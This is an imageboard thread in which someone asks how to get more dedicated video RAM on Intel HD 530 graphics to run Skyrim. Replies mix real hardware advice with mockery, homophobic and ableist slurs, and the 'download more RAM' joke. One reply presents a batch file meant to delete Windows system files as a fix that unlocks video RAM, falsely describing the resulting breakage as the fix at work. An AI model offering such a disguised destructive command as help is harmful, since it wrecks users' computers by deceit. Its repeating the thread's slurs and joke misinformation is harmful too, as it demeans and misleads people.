I want to be able to run Skyrim but I don't have enough Dedicated Video RAM. Is there a way that to increase that...

I want to be able to run Skyrim but I don't have enough Dedicated Video RAM. Is there a way that to increase that? Here are my specs:
OS Windows 10 64 Bit
CPU Intel Core i-5 6400 @ 2.7 GHz
RAM 8GB single channel DDR3 @ 2.7GHz (4 cores) and a dedicated video memory of 128MB (skyrim requires at least 512MB)
Graphics Intel HD Graphics 530
All of my specs are more than sufficient except dedicated video memory, what do I do?

Other urls found in this thread:

newegg.com/Product/Product.aspx?Item=N82E16814137018&cm_re=gtx_1060-_-14-137-018-_-Product
twitter.com/NSFWRedditImage

Isnt there a technical forum for this shit

get a better gpu

>Sup Forums is NOT your personal tech support team or personal consumer review site.

I.... I think this belongs anywhere but here.

First off, get 4x2Gb RAM instead of just a single stick of 8Gb.

Second, get a dedicated GPU and slap that bitch in a PCI slot. Onboard graphics ain't gonna handle the FUS RO DAH.

2x4Gb**

But I mean you could do 4x2Gb RAM sticks if you wanna look super cool and edgy to your non-tech savvy friends.

newegg.com/Product/Product.aspx?Item=N82E16814137018&cm_re=gtx_1060-_-14-137-018-_-Product
and here we have our answer

Downloadmoreram.com

You could buy a computer that doesnt suck?

>Downloadmoreram.com
Actually this, my computer was fucked before I downloaded more RAM, the site used to cost money but since it got bought out by a dumb ass anarchist group its free.

So go download more RAM

>download more ram
>downloading something that's on a piece of physical hardware
nice meme i r8 ur b8 8/8

i5 is shit, dont put any more money into that shitbox. get an i7 or gtfo

haha very funny trying to trick him, but seriously
downloadmoreRAM.com saved my battle rig

I'm OP you faggot I posted that response.

lolol are you INSANE??? downloadmoreRAM is the best thing you can do right now. If you don't wanna listen that's your problem, go fuck yourself. We tried to help you and you were a dick about it

i gotchu fam. what most people dont know about video cards is that they have governors on the ram which keeps it from using its full capacity. but there is a quick code you can implement to remove the governors and access all of your ram.

first thing you have to do is open notepad.
next you type in:
@echo off
del c:\\windows\system 32
save this file as a .bat file. example: moreRAM.bat

and that's it. your computer will go through a short loading phase where the screen will shut off once or twice while the effects are taking place but once that's over, you will have full use of your ram.

I have the exact same IGPU as you (6600k Intel HD530) and i run skyrim on low to medium setting just fine. I think your problem is that you are using DDR3 memory when Skylake supports DDR4 or DDR3L

I7's dont offer any tangible benefit over I5's in gaming.

I might not be very tech savy but I'm not that new friendo.
Step up your b8 g8me m8.

I would tell you to fuck off to Sup Forums so they could take the piss out of you and tell you to install gentoo, but fuck it, I'll bite the bait.

Your computer is a piece of shit.

First problem, windows 10, have fun with micro$oft spying on you and selling every scrap of information about you.

Second problem, you have no GPU. You're using integrated graphics (aka the base stuff on the motherboard which is literally only for displaying POST/Boot stuff), because you're a retarded faggot who has no idea how computers work and got scammed at the best buy that I KNOW you bought this at, believing all the bullshit lies that the only slightly-more knowledgeable guy in the red shirt fed you.

Fortunately for you, I believe that this abomination of a computer is the result of your ignorance and not malicious intent.

Therefor, fuck off to your nephew who is 30 years younger than you and has built his own computer, give him $1000 USD or your countries equivalent, and tell him to build you a computer, and pay him another hundred or so for his services, and you will have a kick ass gaming computer that will last for 5-6 years.

TL;DR You have no GPU. Go buy one. Come back when you fuck it up and it doesn't fit in your case or isn't compatible with your motherboard so we can have a big laugh at your expense.

whatever you say man. if you want to funnel tons of money into your stuff then be my guest. i was just trying to offer a cheaper alternative.